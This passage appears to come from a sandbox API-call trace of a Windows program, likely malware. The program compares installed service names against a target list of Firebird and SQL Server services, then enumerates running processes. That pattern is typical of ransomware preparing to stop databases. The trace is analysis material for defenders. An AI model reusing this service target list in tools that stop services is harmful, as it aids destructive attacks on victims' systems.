[0172.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0172.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0172.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0172.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0172.492] lstrlenW (lpString="DPS") returned 3 [0172.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0172.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0172.492] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0172.492] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0172.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0172.492] lstrlenW (lpString="DusmSvc") returned 7 [0172.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0172.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0172.492] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0172.492] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0172.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0172.492] lstrlenW (lpString="EventLog") returned 8 [0172.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0172.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0172.492] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0172.492] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0172.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0172.492] lstrlenW (lpString="EventSystem") returned 11 [0172.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0172.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0172.492] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0172.492] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0172.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0172.492] lstrlenW (lpString="FontCache") returned 9 [0172.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0172.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0172.493] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0172.493] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0172.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0172.493] lstrlenW (lpString="gpsvc") returned 5 [0172.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0172.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0172.493] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0172.493] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0172.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0172.493] lstrlenW (lpString="iphlpsvc") returned 8 [0172.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0172.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0172.493] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0172.493] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0172.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0172.493] lstrlenW (lpString="KeyIso") returned 6 [0172.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0172.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0172.494] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0172.494] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0172.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0172.494] lstrlenW (lpString="LanmanServer") returned 12 [0172.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0172.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0172.494] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0172.494] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0172.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0172.494] lstrlenW (lpString="LanmanWorkstation") returned 17 [0172.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0172.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0172.494] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0172.579] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0172.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0172.579] lstrlenW (lpString="lfsvc") returned 5 [0172.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0172.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0172.579] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0172.579] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0172.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0172.579] lstrlenW (lpString="lmhosts") returned 7 [0172.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0172.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0172.579] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0172.579] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0172.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0172.579] lstrlenW (lpString="LSM") returned 3 [0172.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0172.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0172.579] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0172.579] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0172.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0172.579] lstrlenW (lpString="MpsSvc") returned 6 [0172.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0172.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0172.579] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0172.579] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0172.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0172.579] lstrlenW (lpString="NcbService") returned 10 [0172.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0172.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0172.580] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0172.580] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0172.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0172.580] lstrlenW (lpString="netprofm") returned 8 [0172.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0172.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0172.580] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0172.580] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0172.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0172.580] lstrlenW (lpString="NgcSvc") returned 6 [0172.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0172.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0172.580] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0172.580] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0172.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0172.580] lstrlenW (lpString="NlaSvc") returned 6 [0172.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0172.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0172.580] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0172.580] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0172.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0172.580] lstrlenW (lpString="nsi") returned 3 [0172.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0172.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0172.580] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0172.580] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0172.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0172.581] lstrlenW (lpString="PcaSvc") returned 6 [0172.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0172.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0172.581] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0172.581] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0172.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0172.581] lstrlenW (lpString="PlugPlay") returned 8 [0172.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0172.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0172.581] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0172.581] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0172.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0172.581] lstrlenW (lpString="Power") returned 5 [0172.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0172.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0172.581] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0172.581] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0172.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0172.581] lstrlenW (lpString="ProfSvc") returned 7 [0172.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0172.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0172.581] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0172.581] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0172.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0172.581] lstrlenW (lpString="RpcEptMapper") returned 12 [0172.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0172.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0172.581] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0172.582] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0172.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0172.582] lstrlenW (lpString="RpcSs") returned 5 [0172.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0172.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0172.582] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0172.582] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0172.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0172.582] lstrlenW (lpString="SamSs") returned 5 [0172.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0172.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0172.582] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0172.582] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0172.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0172.582] lstrlenW (lpString="Schedule") returned 8 [0172.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0172.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0172.583] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0172.583] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0172.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0172.583] lstrlenW (lpString="SecurityHealthService") returned 21 [0172.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0172.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0172.583] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0172.583] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0172.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0172.583] lstrlenW (lpString="SENS") returned 4 [0172.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0172.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0172.583] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0172.583] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0172.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0172.583] lstrlenW (lpString="ShellHWDetection") returned 16 [0172.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0172.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0172.583] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0172.583] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0172.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0172.583] lstrlenW (lpString="Spooler") returned 7 [0172.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0172.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0172.583] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0172.583] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0172.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0172.584] lstrlenW (lpString="StateRepository") returned 15 [0172.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0172.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0172.584] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0172.584] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0172.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0172.584] lstrlenW (lpString="SysMain") returned 7 [0172.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0172.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0172.584] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0172.584] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0172.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0172.584] lstrlenW (lpString="SystemEventsBroker") returned 18 [0172.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0172.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0172.584] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0172.584] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0172.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0172.584] lstrlenW (lpString="Themes") returned 6 [0172.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0172.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0172.585] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0172.585] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0172.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0172.585] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0172.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0172.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0172.585] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0172.585] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0172.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a4f50 | out: hHeap=0x6a0000) returned 1 [0172.585] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x514 [0172.590] Process32FirstW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.591] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0172.591] lstrlenW (lpString="System") returned 6 [0172.592] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0172.592] lstrlenW (lpString="smss.exe") returned 8 [0172.593] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.593] lstrlenW (lpString="csrss.exe") returned 9 [0172.593] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0172.594] lstrlenW (lpString="wininit.exe") returned 11 [0172.594] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.595] lstrlenW (lpString="csrss.exe") returned 9 [0172.596] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0172.596] lstrlenW (lpString="winlogon.exe") returned 12 [0172.597] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0172.598] lstrlenW (lpString="services.exe") returned 12 [0172.598] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0172.599] lstrlenW (lpString="lsass.exe") returned 9 [0172.599] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0172.600] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0172.600] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0172.601] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0172.601] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.602] lstrlenW (lpString="svchost.exe") returned 11 [0172.602] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.603] lstrlenW (lpString="svchost.exe") returned 11 [0172.603] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0172.604] lstrlenW (lpString="dwm.exe") returned 7 [0172.604] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.605] lstrlenW (lpString="svchost.exe") returned 11 [0172.605] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.606] lstrlenW (lpString="svchost.exe") returned 11 [0172.606] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.607] lstrlenW (lpString="svchost.exe") returned 11 [0172.607] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.608] lstrlenW (lpString="svchost.exe") returned 11 [0172.608] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.609] lstrlenW (lpString="svchost.exe") returned 11 [0172.609] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.610] lstrlenW (lpString="svchost.exe") returned 11 [0172.610] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.611] lstrlenW (lpString="svchost.exe") returned 11 [0172.611] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.612] lstrlenW (lpString="svchost.exe") returned 11 [0172.612] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.613] lstrlenW (lpString="svchost.exe") returned 11 [0172.613] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.626] lstrlenW (lpString="svchost.exe") returned 11 [0172.626] Process32NextW (in: hSnapshot=0x514, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0172.627] lstrlenW (lpString="spoolsv.exe") returned 11 [0172.627] Process32NextW (in: 